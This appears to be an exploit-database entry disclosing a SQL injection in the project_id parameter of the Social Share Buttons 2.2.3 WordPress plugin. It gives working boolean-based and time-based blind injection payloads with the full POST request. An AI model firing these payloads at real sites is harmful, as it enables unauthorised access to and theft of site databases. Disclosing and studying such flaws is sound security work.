Exploits / Vulnerability Discovered : 2023-03-28 |
Type : webapps |
Platform : php
This exploit / vulnerability Socialsharebuttons v2.2.3 sql injection is for educational purposes only and if it is used you will do on your own risk!
## Description:
The `project_id` parameter from the Social Share Buttons-2.2.3 on the
WordPress-6.0.2 system appears to be vulnerable to SQL injection
attacks.
The malicious user can dump-steal the database, from this system and
he can use it for very malicious purposes.
WARNING: The attacker can retrieve all-database from this system!
NOTE: The users of this system are NOT protected, this SQL
vulnerability is CRITICAL!
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: project_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=social-sharing-share&project_id=378116348' or
'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=social-sharing-share&project_id=378116348' or
'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND
'KWbC'='KWbC&network_id=5&post_id=
---
```